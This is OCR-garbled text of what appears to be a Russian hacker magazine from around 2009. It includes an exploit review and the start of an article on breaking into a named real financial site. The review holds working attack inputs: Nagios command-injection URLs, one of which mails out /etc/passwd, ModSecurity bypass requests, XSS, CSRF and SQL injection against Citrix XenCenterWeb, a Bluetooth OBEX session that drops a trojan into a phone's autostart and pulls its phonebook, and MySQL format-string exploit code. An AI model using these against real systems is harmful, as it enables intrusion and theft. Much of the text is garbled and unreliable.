дтпзЕа /зегѵег :<зегѵег_ас!с1гезз> 

3. Отключаем сессию: 

ІодоіЛ <зеззіоп_іЦ> /зегѵег :<зегѵег_ас!с1гезз> 

4. Коннектимся к серверу по РРР. тг 



чего винда работает в режиме «Удаленного 
администрирования» и разрешаеттолько два 
одновременных сеанса, втом числе и отклю- 
ченных. Ситуация воз ни кает достаточно часто, 
например, если админ на сервере не выполняет 
выход из сессии, а при окончании работы прос- 
то закрываетокноудаленного рабочего стола. 
Принципиально возможно два пути решения. 
Первый и наименее беспалевный — дождаться, 
пока какая-нибудь из сессий незавершится. 
Если утебя много дедов, это вполне приемле- 
мо, в противном случае надозанятьактивную 
позицию и выбить одного из пользователей. Как 
это сделать, когда ксерверудаже не приконек- 
титься? Если на удаленном узле открыт порт 445, 
можно воспользоваться средствами командной 
строки для отображения текущих сеансов и их 
отключения. 

1. Создаем доверенные отношения с удаленным 
узлом с использованием «пеі иве»: 

пеС изе \\<зегѵег_асМгезз>\ 

ІРС$ <ас1тіпізЦгаСог_раззѵгогс1> / 



ринудительный Іодой 



I Іп.і З/Ъсііігі.рзв 

; ^ >нв I иг. в "\Ч1 ТА , 1 Ь ь 1 . 1Ь"\ [ /іізів г : лііп іп іеігаЬ иг 

« ии Йс пі м- г в льньи! плрил-ь млн ини ми ль-эевпгвли ліч ЧЧ17Я. 16 .1 . . 

ІЧ'ЦШЧ Гк*рйі*ь ЙЛІ« ' Ай-ІІгЧіСОг' Я-Пкі л ичсц КІІ и. 1 ] ѴЦ . X Ь т 1 . 15 ' ' 

йгНЛпД Л ВЫЛ«ННВНВі >|СРН:ипи. 



ІЧ>Пі*Е Іігіп 

плыг і 1 ! л аі' ■іт. м мніі г.^ц.^|р аапшнілны. 



.□к 

п 



кіетинішг 


Лок.і лігИиЧ ІІпл.ігміш^ 




Свть 




.1 к 


\\т, ій . і 


ЛЬЧІЙ 


Піѵгѵѵі 


йІІ ЦГІкі 


Ьиапдіі іікіии 










з* -в 


в і* =172 . ІС . 1 . 1С 








СЕАНС 


ПО/ІЬ^ОИРТЕіПь 


IV 


Г.ІнГЧі'. 


ТИП 


ССП44І4 


ЙіІ п І г"і і і гй 


а 


Ане ыіі ігп 












РГІНШІ 


мЩ-ІІС рі 1 


П-Н П 1 П 1 П І.ГЯ СП-Р 


і 


Ліііыл ікп 


ргірчні 


ічір ЛсиВН] У ГмІ п зп іпіглкир 


г 


Гіи гни на 


пЛрчтН 


Я А 


/ьр гиг г ; 1 72 .16 . 1 ЛЬ- 








Г-\>кі*річр&С« 


ѵ гѵ от - 172 , Из . 1 . 1 Ь 








СЬ-П нс 


МѴЙЬЗДВй ?ЁПЬ 


IV 


С ІП 1 ѵс 


тип 


едп&вів 


йч! п іп л і 4 з'й Ьнц-і- 


о 


Активна 










Прнвчі 




|-=Н 11 


ЙчМчІПІіГМ.і:*Г 


1 


Йк/Сминй 
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взлом 



■ ■ АНДРЕЙ КОМАРОВ /НТТРЦ/ѴѴАР-СНАТ.РУ/ 



Обзор Эксплоитов 




/ '—\Г 



\ ^ г і ігтг, піі : 



Ш* 

I ^ ИмріНа рмніілІ 

ЕХРК } _ шин 4я яеЫѵн 

^Ч*і* 



$ Циті» 



ІЧ чам 



> ТмшАа “-рз БкЬіеі» 

ЯІ іц *чиі№ Ьни 

ігіѴ" Ьга** Ьпн 



X 

Сколько всего произошло! Слухи о закрытии тіІѵѵОгт.сот и появле- 
ние кучи зеркал — вне обсуждения. Лето выдалосьжарким нетолько 
потемпературе, но и по движениям в мире эксплойтов и уязвимостей 
ПО: браузерные бреши в Могіііа Рігеі'ох 3.5 и АсбѵеХ- компоненте 
Ѵібео МісгозоЛ Іпіегпеі: Ехріогег 7, критическиеуязвимости в ряде 
ОрепЗоигсе-продуктов, а китайцы готовят супер-защищенную ОС 
куііп! Времени отдыхать просто нет. Надо атаковать! 



ЛИСТИНГ КАТАЛОГА 
■р НАУДАЛЕННОМ 
СМАРТФОНЕ 




НЕАВТ0РИЗИР0ВАНН0Е 
ИСПОЛНЕНИЕ ПРОИЗВОЛЬНЫХ 
КОМАНД В N А6І05 



Ыадіоз — система мониторинга с открытым исходным кодом, ис- 
пользующаяся даже в корпоративном секторе. В сетевой инфраструктуре 
она занимает место «нюхача», который следит за службами, корректнос- 
тью их функционирования, всевозможными компонентами сети. В случае 
чего, Ыадіоз генерируетоповещение, чтобы администратор своевремен- 
ноустранил проблему. Для удобства администрирования Ыадіоз может 
управляться посредством мобильного телефона через технологию ѴѴМІ_. 
Условно говоря, администратор, отдыхая на даче, заходит через сотовый 
на сайт, выбираеттам линки и смотрит статус системы, живучесть отдел ь- 
ныххостов, присланные оповещения и еще много всего. 



ЕХРЮІТ 



I Уязвимость содержится в модуле проверки статуса, причем 
сразу в двух местах (утилитах РІЫВ/ТРАСЕРОІЛЕ], хотя суть самой 
брешитипична и сводится кнебезопасному использованию системных 
вызовов «рореп». Кэтой серии, вообще, можно причислить целый класс 
небезопасного программирования, связанного с выполнением команд. 
Они попадаются в самыхудивительных местах. Кпримеру, пару месяцев 
назад одним хакером был взломан известный закрытый форум Макака, 
где модуль І га се го и Іе форума ѴВцЦебп уязвим описываемой нижеуязви- 
мостью. 

Утилиты находятся тут: 



Сооіз -> ріпд 

Соо1з-> ТгасегоиСе Ѵ7АР/Ѵ\/МЬ радез 



Использовать их можнотак: 



ЪДЦрз : //зошеЬозС . сот/падіоз/сді-Ьіп/зСаСизжпІ . сді?ріпд 
=173.45.235. 65%ЗВесЬ.о+%24РАТН 
(%В - " ; " в А8СІІ , %24 — " $ " ) 



После исполнения я получил результаты, что удаленный хостжив, и 
его сетевые параметры, а также полный вывод переменной окружения 
(РгееВЗО / $ РАТ Н ) : 



/зЬіп: /Ьіп: /изг/зЬіп: /изг/Ьіп: /изг/датез : /изг/іосаі/ 
зЬіп : /изг/ІосаІ/Ьіп: /гооС/Ьіп 



Код уязвимой процедуры сі ізр1ау_рі пд из модуля зіаішзѵѵппі.с: 

/* гип Щіе ріпд соттапсі */ 
ір=рореп (Ьиііег , " г" ) ; 



іП(ір) { 
вдЬіІе (1) 

{ 

ідеСз (Ьиііег , зігеоі (Ьиііег) -1 , ір) ; 
іі ( іеоі ( ір) ) 

Ьгеак; 

зСгір (Ьиііег) ; 
іі ( осісЗ.) 

{ 

ос!с1=0 ; 

ргіпСі ( " %з<Ьг/>\п" ,Ьиііег) ; 

} 

еізе 

{ 

ос1с1=1 ; 

ргіпСі ( "<Ь>%з</ЬхЬг/>\п" ,Ьиііег) ; 

} 

} 

} 

еізе 

ргіпСі ( " Еггог ехесиСіпд 
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Атака в прогрессе 



|1Тпы2пд Ні17ік1гйі&:Ы:7) 



кГштгЕ: Щ 
іСпгыііс? 2 г . , йирш 

.*«"ь*ЛгІгч аіт-плстіі - ЙЧИ14 ". .V іим»ч ' * 4ІЛЛІ 1 

Ыяні ѴВПІЛП^'І.О'Т^ 

кІКСТѴИ ГйМег-ІШІЧ ТріТЬч ’е*гл (пЫег ИШрч.йИ*'* 

ѵ Га I й с г ■ 1 1 %% і па ѵві ііпг>- ' ] . й">- 
^•ІьН етіІ - Гаііігг пдаг*- , А /і 

гіі>.ісг ядае»'!ч* г'.сіътсу- сгсаге^ л ао»тВ4взтзіизл'/у 

^оим • I п "Ну рипуіиіеі 1 ЫЕнЬЕЙ--ІІЯ7в^*ШІй(іНІ-/^ 

-гт> плгі и і|ІвііеЦг ЫкЬ.яій* рг^л-еЛ- - т ДОТ&и»1ГЗІН2й2' ^ігег'ЪіЭЕІ'/* 
■С*' И а І^ЙГЯЕ і- " еЬЯ г-:і ал г" с г ?л{С(М ' 7Н 7 ОДЯ 2 Т '. 1М2«' 1ІИ*'И«Ѵ Ь 
- Г 1 \ г И*нс -Й&дЬагРк .маѵ - ЬГЕЛ I есЬ ' 21Ш(Н*1Г1 1 0»7В І ' 1 1м- “ 4 П4в ■ / р 

пж- т Ну Уігія* н егевтЕй-'гФФТ&МХТПйв?*?»/* 

№й.|тг ііін-'ШЕмМііі* <™ікЫ,гМ7«+І1Т11«™-/> 

Шлігі^г п*ісъ-ТЪчЛі№ к сгаіг«к'2»7&4втзвеів7-/* 

ЕтаІіНг ікяк-"С»рігияійГіІй Де аітівіміп' сгсв^О-'а^гааіг^іі^ММІѴ* 

Ьі^ег - 1 



: іга , , г мпс 
рі-і аМ і т : 



ріпд! \п" ) ; 
рсіозе ( Ер) ; 



Как нетрудно заметить, рореп исполняетлюбое содержимое, которое 
попадает в переменную ЬиТег. В и Те г контролируется в коде только при 
объявлении на ограничение вводимыхданных (сЬагЬиТег[МАХ_1ЫР11Т_ 
ВІІРРЕР];], но его содержание абсолютно произвольно. Логика составле- 
ния буфера такова: сначала он освобождается, далее пустой буфер слипа- 
ется стем, что мы ввели для пинга в качестве адреса, и скармливается на 
исполнение. Втом числе, знаки пробела, ведь это же нигде не оговорено: 



Ви Іез], защищающими оттипичныхатакна ѴѴЕВ-приложения. Из-за 
специфики обработки соокіе в СЕТ/РОЗТ-запросах со стороны А5Р. 

ЫЕТ существует возможность обойти ограничения МосІ_5есигТу. Когда 
многочисленные параметры «куков» одного и того же имени встречаются 
в НТТР-запросе,то А5Р/А5РЫЕТ- приложен и я расцениваютих как«кол- 
лекцию объектов». Проще говоря, считают элементами массива. 



ЕХРЮІТ 



Кпримеру, мы производим ВОЕ-іщесбоп: 



ЬЕЕр : / /ехатріе . сот/зеагсЪ. . азрх?ѵа1ие=зе1есЕ 1,2,3 Егот 
ЕаЫе 



ІЕ ( ! зЕгстр ( Еетр_рЕг , "НОЗТАББКЕЗЗ " ) ) 

зЕгпсаЕ (ЬиЕЕег ,ріпд_аскігеЗЗ , зЫеоЕ (ЬиЕЕег) - 
зЕгІеп (ЬиЕЕег) -1) ; 



Конечно, никто не мешает нам в качестве адреса задать 127.0.0.1 ;таіІ </ 
еіс/раввѵѵб или какую-либо критически важную директорию. 



ТАВСЕТ5 



| Ыадіов на базе 3.x ветки + 2.0гс2 (версии, где возможна 
установка дополнительных модулей, а именно — включенного ѴѴАР-ин- 
терфейса]. 



50ШТЮЫ 



(Создатель быстро отреагировал на уязвимость и написал 
решение. Вдобавок много любителей еще раньше выпустили собствен- 
ные патчи [ ігаскег.пааіо5.ога/ѵіеѵѵ.рЬр?ісІ=1 5 1. убирающие пробелы и 
добавляющие проверку на правильность указанного домена или ІР. 




М(Ю_5ЕСІІРІТѴ НТТР 

РАКАМЕТЕК 

РОІ_І_ІЯІОЫ 



Все нормально, при этом отнасулетел запрос вида: 

РОЗТ /іпсіех. азрх?а=1&а=2 
НозЕ : ѵтѵтм . ехатріе . сот 
Соокіе: а=5; а=6 
СопЕепЕ-ЬепдЕЬ. : 7 
а=3&а=4 



На серверной стороне этот запрос интерпретируется следующим образом: 

МосІЗесигіЕу : 

ѵаіие = зеІесЕ 1,2,3 Егош ЕаЫе 
ШеЪ АррІісаЕіоп ІпЕегргеЕаЕіоп : 
ѵаіие = зеІесЕ 1,2,3 Егош ЕаЫе 

Делаемтеперьтак: 

ЬЕЕр : / /ехатріе . сот/зеагсЪ. . азрх?ѵа1ие=зе1есЕ 
1&ѵа1ие=2,3 Егош ЕаЫе 



МІЛ Знаменитый ѴѴеЬАрр-бгеѵѵаІІ терпит бедствие. Как известно, это моЬЗесигіЕу : 

модуль Арасбе со специально подключенными наборами правил (Соге ѵаіие = зеІесЕ 1 
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ѵаіие = 2,3 Ігош ЬаЫе 
МеЪ Арріісакіоп: 

ѵаіие зеіеск 1,2,3 Ігот ЬаЫе 




МНОГОЧИСЛЕННЫЕ 
УЯЗВИМОСТИ В СІТШХ 
ХЕМСЕЫТЕРѴѴЕВ 



Интересно, правда? Эксперименты могут продолжаться до бесконеч- 
ности: 



ЪДСр : / /ехатріе . сот/зеагск . азрх?ѵа1ие=зе1еск/*&ѵа1ие=* / 
1,2, 3 /*&ѵа1ие=*/1гот/*&ѵа1ие=*/каЪ1е 

МосІЗесигіРу : 

ѵа1ие=зе1еск/* 
ѵа1ие=*/1 ,2,3/* 
ѵа1ие= * / Ігот/ * 
ѵа1ие=* /СаЫе 
ШеЪ АррІісаСіоп: 

ѵаіие = зеіеск/* , */1 , 2 , 3 /* , */1гот/* , */СаЫе 

Очень часто такой прием может быть использован при обходе Моб_ 
Зесигііу. Термин НТТР Роіибоп был введен Ьиса СагеНопі и ЕЫапо 
бі Раоіа и представлен на недавно прошедшей конференции 0ѴѴА5Р 
АррЭес ЕІЮ9 РоІап<± В работе «5рІіІ апб боіп» П.аѵакитаг.сот/5рІП: 
апб Э о і п . рсіі ) Еаѵакитаг Киррап осветил возможность эксплуатации 
уязвимости на примере ѴѴАР. Ранее уязвимость уже использовалась в 
работах других зесигііу-ресечеров, например, для написания эксплойта 
под ОЕЕаЬз РТК [ Ы:1:р://5есІІ5І:5.огд/Ьид1:гад/2008/М оѵ/0038. Ыт I ). 
НТТР Рагатеіег Роіійіоп — один из явных способов обхода ѴѴАР 
(ѴѴеЬ АррІісаРюп Рі геѵѵа II) . 

Параметрами любого НТТР-запроса являются пары (словарь 
— ключ + значение], разделенные символом « = ». Границы 
параметров, в свою очередь, определяются с помощью симво- 
лов «&» и «;», но беда в том, что тот же стандарт не запрещает 
многократное использование одинаковых имен в НТТР-запро- 
сах. В связи с особенностями восприятия на стороне ПО опи- 
санных выше запросов возможно нарушение логики работы 
ѴѴЕВ-приложений и появление способов эксплуатации многих 
уязвимостей. 



ТАВ6ЕТ5 



МосВесигТу <=2.5.9 с набором правил МосВесигТу Соге Риіез 



ѵ 2. 5-1. 6.1. 



50ШТЮЫ 



На данный моментустранение уязвимости отсутствует. 



^^^Графический фронтенд к СТгіхХепЭегѵег позволяет визуально 
управлятьтвоими виртуальными машинами в пуле ресурсов, предпри- 
нимать различные действия вроде останова или перезапуска, всячески 
рулить пользовательскими отношениями и еще много чем. 



ЕХРЮІТ 



|Кактакового, одного эксплойта здесь не нарисуешь — найден 
целый рядбрешей в безопасности: 

0X55 — межсайтовый скриптинг. 



кРРрз : / /хепсепРеплеЪ . Іос/сопІід/есІіЦизег . ркр?изегпате= 
1<зсгірР>а1егР (сІоситепЦ . соокіе) </зсгірк> 

Грамотно составленное письмо от доверенного лица Ьеірсіезк’а сыграетсвою 
роль с этой ба гой. В качестве снифера для ловли кукисов можно использовать 
существующий софт КапіскЕпіИег или онлайн-сервис (АпбсЬаЕш). 

2) С5РЕ — СгоззВке Редиезі: Еогдегу. С5РЕ расшифровывается как 
Сгозз-5і1:е Редиезі: Еогдегу («Межсайтовая подделка запроса»]. Этоттип атак 
направлен на имитированиезапроса пользователя к сторон нему сайту. Уяз- 
вимость достаточно широко распространена из-за особенностей архитектуры 
большинства веб-приложений. Аименно-из-затого, что многие веб-прило- 
жения нечетко определяют, действительно л и запрос сформирован настоящим 
пользователем. Такие ситуации часто встречаются там, где есть единственное 
средство распознавания клиента — соокіез или сессия (ну, иногда еще геіегег]. 
Соответственно, если с помощью определенного кода заставить браузер отпра- 
вить нужный нам запрос на сторонний сайт, то запрос может вполне нормально 
пройти даже ктем скриптам, в которых нужна авторизация — ведь браузер при 
запросах к сайту отправляет ему и соокіез. Главное, чтобы пользовательзара- 
нее был авторизирован. Порой, проявив смекалку, с такой уязвимостью можно 
творить чудеса (на Новый Годдвафранцузскиххакера рулили включением и 
отключением огней на центральной новогодней елке]. 



Неавторизированная смена пароля : 

кРРрз : / /хепсепРеплеЪ . Іос/сопіід/скапдерчл. 

ркр?изегпате= [ ѵіскіт_изегпате] &пеілгразз = [аккаскег'з_ 

скозеп^рѵгсП 

Выключение конкретной виртуальной машины: 

ЪДДрз : //хепсепРеплеЪ. 1ос/Ьагс1з1іорѵт.р]тр?5Цор_ 
ѵшге1= [ѴМгеІ] &зкор_ѵтпате= [ѴМпате] 

Вііпсі ЗОЬ Іп^есСіоп — проведение слепой инъекции, ис- 
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ВОТ ТАК 
В РЕАЛИЯХ 
ВЫГЛЯДИТ 
№6105 ѴѴАР 
ІЫТЕКРАСЕ 




СОДЕРЖИ МОЕ /ЕТС/РА55ѴѴ0 С 
УДАЛЕННОГО СЕРВЕРАУ МЕНЯ НА 
ПОЧТЕ 



пользуя временные параметры: 

ЬДбрз : //хепсепбегмеЪ. 1ос/1одіп . рЪр?изегпате=изег ' 
ШГІОЫ ЗЕЬЕСТ іі (изег ( ) ЫКЕ 

' гооб@% ' , ЬепсЬлагк (1000000 , зкаі ( ' кезк 1 ) ) , ' Раізе ' ) /* 



ТАРОЕТ5 



іІгіхХепСепІегѴѴеЬ. 



50ШП0Ы5 



никакие отреагировала на столь существенные уязви- 



мости. 




АТАКА НА ѴѴШ00ѴѴ5 

МОВИЕ 0В^ЕСТ ЕХСНАМ6Е (ОВЕХ) / 

СМАРТФОНЫ НТС 



ЬАР, ОВЕХ, 0РР, РАЫ 5РР, АѴ, ВІР, РТР, 6АР, НЮ, 50АР, нотебе 
придется ковыряться в их же 5 О К, которые поставляются когда 
бесплатно, а когда и по запросу от производителя. Причем при 
«заказе» потребуется доказать, что ты являешься независимым 
разработчиком и намека на заработок в твоих исследованиях 
совсем не видно. 

Но это все лирика. Изначально так повелось, что ВІиеХ — реали- 
зация стека ВІиеІооіЬ для І_іп их, ее официально включили в пакет 
І_іпих Кегпеі. В настоящее время она поддерживаетабсолютно все 
протоколы ВІиеІооІЬ. Вдобавок, в пакетах ксистеме можно встретить 
ЬІиег-ибІз/Ыиег-бгппѵѵаге — содержат пару утилит, которые помогут 
тебе почувствовать себя с ней более свободно. Для начала установи 
саму Віиег, а затем ОЬехРТР [ ігід.пеі/оЬехКр ): 



^^^ДСтаро, какмир! Віиеіюобѵсервис известной марки смартфонов 
и коммуникаторовуязвим, причем самой багеужеоколо 10 лет. В свое 
время через ОВЕХ распространялись первые мобильные червяки. ОВЕХ 
РТР ВІиеІооіЬ зегѵісе используется для «обмена» файлами через бес- 
проводной канал. «Обмен»следуетвоспринимать нетолько какотдачу 
конкретного локального файла стороннему клиенту, но и как возможности 
удаленному клиенту изучать содержимое «шары»твоего мобильника. 
Опасность заключается в том, что при каких-либо условиях злоумыш- 
лен нику удастся обойти ограничения, подняться «выше» по каталогам и 
попасть, скажем, в раздел автозагрузки, куда и поместить вредоносный 
код. Другая беда — злоумышленник может просто-напросто похитить 
ценные для тебя да иные телефон ной книги, сообщений, личные записи 
планировщика и многое другое. 



[щЗНИПроизводитьтакого рода атаки можно с использованием 
ноутбука. Для этого на нем обязательно должна присутствовать поддерж- 
ка стека ВІиеІооШ (одна из реализаций, к примеру, для библиотеки, о 
которой пойдет речь дальше, — это Місгозо^ ВІиеІооіЬЗіаск/ѴѴісІсоппт 
ВІиеІооіЬ 5іаск], и возможность установки дополнительных библиотек, 
выступающих в качестве интерфейса. Самая распространенная для этих 
задач либа — ВІиеХ [ Ыиег.ога/боѵѵпіоаб ) с кучей вариаций на почти всех 
современных языках программирования высокого уровня (руВІиеХ — 
естьѴѴіпбоѵѵз-модуль, регідля этого имеет модуль ЫеІ:ВІиеІоо*Ы. 

Для установки ВІиеХ на ѴѴіпбоѵѵз потребуется Мі егозой Зегѵісе Раск2/3 
и Місго50І1 Ріа^огт 50К. Конечно, ты можешь использовать абсолют- 
но сторонние вещи, вроде Еібегтіпб ВІиеІооІЬ Зіаск, ТозЫЬа Зіаск, 
ВІиеЗоІеіІ. Они, кстати, поддерживают 01Л\І, РАХ, НРР, Н5Р, 



гооЦ@зкѵ 2 : ~/Ыиег$ оЬехІкр -Ь 00 : 17 : 83 : 02 : ВА: ЗС -1 
Организация листинга файлов с удаленного телефона из его 
«шары» 

МАС-адрес устройства можно обнаружить с помощью ксікооі 
-зсап 

Вгомзіпд 00:17:83:02: ВА:ЗС ... 

Скаппеі : 4 
Соппескіпд. . .бопе 

Кесеіѵіпд " (пиіі) " . . . <?хт1 ѵегзіоп= " 1 . 0 " ?> 

< ! БОСТУРЕ Роібег-Іізкіпд 8У8ТЕМ " оЬех-РоІбег-Іізкіпд . 
бкб" > 

сРоІсіег-Іізкіпд ѵегзіоп= " 1 . 0 " > 

<рагепк-1о1бег пате=»» /> 

<Рі1е пате=»боіаса . зрд ,,; сгеакеб="20090119Т1739322" 
зІ2е=»134680 " /> 

<1і1е паше=»пока . рѵ^і " сгеакеб=»20090119Т1752422" 
зіге=»432 "/> 

</Ро1бег-1ізкіпд> 

бопе 

Бізсоппескіпд . . .бопе 

гоокОзкѵг : ~/Ыиег$ оЬехІРр -Ь 00 : 17 : 83 : 02 : ВА: ЗС -с 
" . . \\ . . \\ТДіпбоілз\\8ЦагЦир\\ " -р Ргозап. ехе 
Закидываем файл с вредоносным содержимым в автозапуск 
Вгоѵ^зіпд 00:17:83:02: ВА:ЗС ... 

СЬаппеІ : 4 
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Раскрытием критически важной информации через сервис ОВЕХ грешны не только телефоны НТО 



Соппескіпд. . .(Топе 

Зепбіпд " . . \ . . \1лПпскжз\Іпісіо\ "... сіопе 
Зепбіпд " кго^ап. ехе" . . . \<Топе 
Бізсоппескіпд . . .(Топе 
гоок@зкѵг : ~/Ыиег$ 

Тго]ап.ехе выполнится при последующем рестарте девайса. Как видишь, 
таким способом можно осуществить «ЫиезпагТіпд» на слабозащищенный 
профиль ОВЕХ (ОЬіесІ: Ехсбапде РизЬ Ргобііе). Соответственно, ты понима- 
ешь, НТО не единственный, который так можно атаковать. Это распростра- 
ненная проблема многихтелефонов. 

Пример из ЖИЗНИ: 

Открываем ноутбук, ставим оЪехккр, в качестве ОС — Ьіпих 
гоок@зкѵг: ешегде -з оЪехккр 
Зеагскіпд. . . 

[ Кезиікз ког зеагсЪ. кеу : оЪехккр ] 

[ Арріісакіопз кошкТ : 1 ] 

* пек-мігеІезз/оЪехккр 
Ьакезк ѵегзіоп аѵаіІаЫе : 0.10.6 
Ьакезк ѵегзіоп іпзкаііесі: 0.10.6 
Зізе ок (ТоѵшІоасТеб кііез: 368 кВ 
Ношераде: Ъккр : / /кгід . пек/оЪех 

Безсгіркіоп: Еііе кгапзкег оѵег ОВЕХ ког шоЫІе ркюпез 
Ьісепзе: СРЬ-2 

гоок@зкѵг: ешегде пек-члігеІезз/оЪехккр 
Производим сканирование устройств 
гоок@зкѵг: Ъсікооі зсап 
Зсаппіпд . . . 

00 : 0А : Б9 : 5А: 9С : 22 Раскекмегкз Ркюпе 
Запрашиваем с телефона данные Ѵсагсі из РкюпеВоок 
гоок@зкѵг : оЪехккр -Ь 00 : 0А: Б9 : 5А: 9С : 22 -В 10 -д 



кеІесот/рЪ . ѵск 

Вгомзіпд 00 : 0А: Б9 : 5А: 9С : 22 ... 

СЪаппеІ : 7 
N 0 сизкот кгапзрогк 
Соппескіпд . . . Ък : 1 
(Топе 

Кесеіѵіпд кеІесош/рЬ . ѵск . . ./(Топе 

Бізсоппескіпд . . . «Топе 

# читаем данные 

гоокОзкѵг : тоге рЬ. ѵск 

ВЕСІЫ : ѴСАКБ 

ѴЕКЗІОЫ : 2 . 1 

N : ЗтікЪ; Аагоп 

ЕМАІЬ; ШТЕВХЕТ; РВЕЕ : изег@кюзк . СОШ 
ТЕЬ;СЕЬЕ: 2135551212 
ЕШ : ѴСАВБ 

ВЕСШгѴСАВВ 
ѴЕВЗІСЖ : 2 . 1 
N : ; АЬЬу 

[. • •] 

ѴСагсІ содержит сведения о контактах в виде визитной 
карточки (именно эти файлы ты кидаешь другу, когда 
хочешь передать ему контакт из своей адресной книжки 
мобильника]. 

ЕГШ5Д Продукты НТО на базе ѴѴіпсІоѵѵз МоЬіІе 6/ 6.1 , пятая ветка — не 
уязвима. 

— отключать ВІиеІіооІіЬ и включать его только тогда, 
когда это необходимо. Этим ты избавишь себя от незаметного хищения 
данныхстелефона. 
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УЯЗВИМОСТЬ 
ФОРМАТНОЙ 
СТРОКИ В МѴ50І. 



^^^ЭБага обнаружена в і Ьтузр ІсІ/зр 1_ра гге .сс. Замечу, что именно 
этотфрагмент кода фигурирует во всех версиях Му5СН_до 6. Обращения 
кфункции тузр 1_1од .ѵѵгііеО без спецификаторов или в других подобных 
ситуациях (когда спефицикаторов больше, чем формируемых перемен- 
ных, например) приводят к отказу в обслуживании. 



» ЕХРЮІТ 



|Ниже привожу фрагмент убийственного эксплойта: 



біпсішіе <зб(ШЪ.1і> 
біпсіисіе <зб(Ио.6> 

#сіебіпе ше_06в_ешстіош 
біпсіисіе <шузд1 /шузді . 6> 
бсіебіпе Ш113 (сбаг *) О 
іпб шаіп (іпб агдс , сЬаг **агдѵ) 

{ 

МУЗОЬ *шузд1 = Ш66; 
шузді = тузд1_іпіб (гпузді) ; 

ІІЕ' ( ! шузді) 

{ 

рибз (" Іпіб баіісі, оиб об шешогу?") ; 
гебигп ЕХІТ_ЕАІ6ШЕ; 

} 

іб ( !шузд1_геа1_соппесб (шузді, /* МУ8С>6 збгисбиге бо 
изе */ 

" Іосаііюзб " , /* зегѵег Ьозбпаше ог ІР асісігезз */ 
"шопбу" , /* шузді изег */ 

"шопбурубЬоп" , /* раззѵтогсі */ 



N1166, /* сіебаиіб (ІабаЬазе бо изе, N1166 
бог попе */ 

О, /* рогб пишЬег, 0 бог сіебаиіб */ 

N1166, /* зоскеб бііе ог пашесі ріре паше */ 
СбІЕЖ’-ЕОШБ^СЖЗ /* соппесбіоп біадз */ ) ) 

{ 

рибз ("Соппесб баіІесІХп" ) ; 

} 

еізе 

{ 

рибз ("Соппесб ОК\п") ; 

// шузд1_сгеабе_с1Ь (шузді , "%з%з%з%з%з"); 
зішр1е_сошшап(1 (шузді , СОМ_СКЕАТЕ_БВ , агдѵ[1], 
збгіеп (агдѵ [1] ) , 0) ; 

} 

шузд1_с1озе (шузді) ; 
гебигп ЕХІТ_ЗІІССЕЗЗ ; 

} 

Эксплойт запускаем так (только в экспериментальных целях): 



$дсс шузд1_богшаб . с -о шузд1_богшаб -Ішуздісііепб 
$ . /шузд1_богшаб %з%з%з%з%з 



ТАРОЕТ5 



|Му501<= 5.0.45. 



ЕПШЕЛ данный момент решения, предложенного производи- 
телем, не наблюдается. Уязвимость имеет место исключительно 
на пост-авторизационном уровне, поэтому главное, от чего пот- 
ребуется обезопаситься — это от неправомерного доступа в твою 
базу данных, т 



ѵѵѵѵѵѵ. т и Ібі] иг. ги 



МУЛЬТИМЕДИЙНОЙ 



журналистики 




Дорогие друзья! 

Медиакомпания Сатеіапсі (25 журналов, 15 сайтов, 2 телеканала) объявляет об открытии Школы мультимедийной журналистики 
для желающих максимально быстро (за 6 месяцев) овладеть увлекательным ремеслом, позволяющим хорошо зарабатывать! 

Мы научим вас создавать материалы для журналов и газет, профессионально фотографировать, снимать телевизионные 
сюжеты, писать тексты для сайтов и поделимся разнообразными секретами журналистского мастерства. Гарантируется практика 
в СМИ Медиакомпании Сатеіапсі (подробнее обо всех проектах - на сайте ѵѵѵѵѵѵ.діс.ги) , после прохождения курса возможно 
трудоустройство в нашем холдинге. 

Занятия - в офисе в центре Москвы (ул. Льва Толстого-18, напротив музея-усадьбы Толстого; метро «Парк культуры»). 






Стоимость обучения в Школе составляет 5 000 рублей в месяц. Срок обучения - 6 месяцев. 

Подробнее об условиях приема в Школу мультимедийной журналистики при Сатеіапсі о сроках подачи документов и видах обучения можно узнать на сайте 
ѵѵѵѵѵѵ. т и Ип‘1 и г. г и, отправив запрос по адресу ророѵ@датеІапс1.ги или гуазкоѵа@датеІапс1.ги, и по телефонам +7 926 091 41 71, +7 926 249 86 75. 

Ждем вас, уважаемые будущие коллеги! 



МУЛЬТИМЕДИЙНАЯ ЖУРНАЛИСТИКА - ЭТО ПРАКТИЧНО И ПЕРСПЕКТИВНО! 
МЫ ЗНАЕМ О НЕЙ ВСЕ И НАУЧИМ ВАС! 



Реклама 












I КЛАССИКА 
ПРОНИКНОВЕНИЯ 
ЗА 8 ШАГОВ 

Терминальный доступ через 50І_-инъекцию ихр_стсІ5ІіеІІ 

В предыдущей статье было показано, кактривиальная инъекция 
может привести к получению контроля над сервером. Теперь мы 
научимся работать с хр_стбзЬеи и преодолевать сопротивление 
ѴѴАР. И все во имя той же цели — заполучить админский доступ 
к серверу по ВОР. 



первой части я препарировал сайт 
І5ПП.ѴѴ5 . который сложно отнести к 
когорте особо интересных. Чтобы у 
тебя не сложилось впечатления, что 
все описываемое — полная лажа и применимо 
только на мелких и заброшенных ресурсах, в 
качестве цели я выбрал более достойного канди- 
дата. Поверь мне, инъекции и прочиеуязвимости 
есть на ресурсах разного масштаба, включая и 



очень раскрученные бренды. Надо только уметь 
их найти и использовать. 

Итак, знакомимся: герой дня — сайт«Ыа1:іопаІ 
аззосіабоп оНебегаІсгесІіІ: ипіоп», или ЫАРСІІ, 
расположенный по адресу ѵуѵууѵ.паісипеіогд 
[ ѵѵѵѵѵѵ.паіюи.огд і и просто напрашивающийся 
на детальный анализ. Сайтец сделан довольно 
прилично, можно даже сказать, радует глаз. 
Глядя натакие ресурсы, невольно думаешь, 



что и с безопасностью здесь все в порядке, но 
реалии упорнотвердятоб обратном. Перед тем 
как воспользоваться Гуглом, я решил проявить 
самостоятельность и провести собственное 
расследование. 

Расширения скриптов наводили на мысль, 
что в качестве движка выступает СоШРизіоп 
(после опыта прошлого вторжения это радует]. 
Буквально на третьей же ссылке при подстановке 
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кавычки я увидел ошибкуна преобразованиетиповданных.а 
уже четвертая исследованная ссылка открыла во всей красе 
эксплойтабельную инъекцию с выводом ошибок и результатов 
запросов. 

Безалаберность и халатность, с которой ведется проектиро- 
вание и разработка интернет-ресурсов многих финансовых 
организаций, заставляет задуматься о качестве их работы в 
целом. Предлагаю всю вину за финансовый кризис возложить 
на непрофессионализм американских буржуев и перейти к 
показательной карательной операции на примере ІЧАРСБІ. 

ШАГ 1 . РАЗВЕДКА МЕСТНОСТИ 

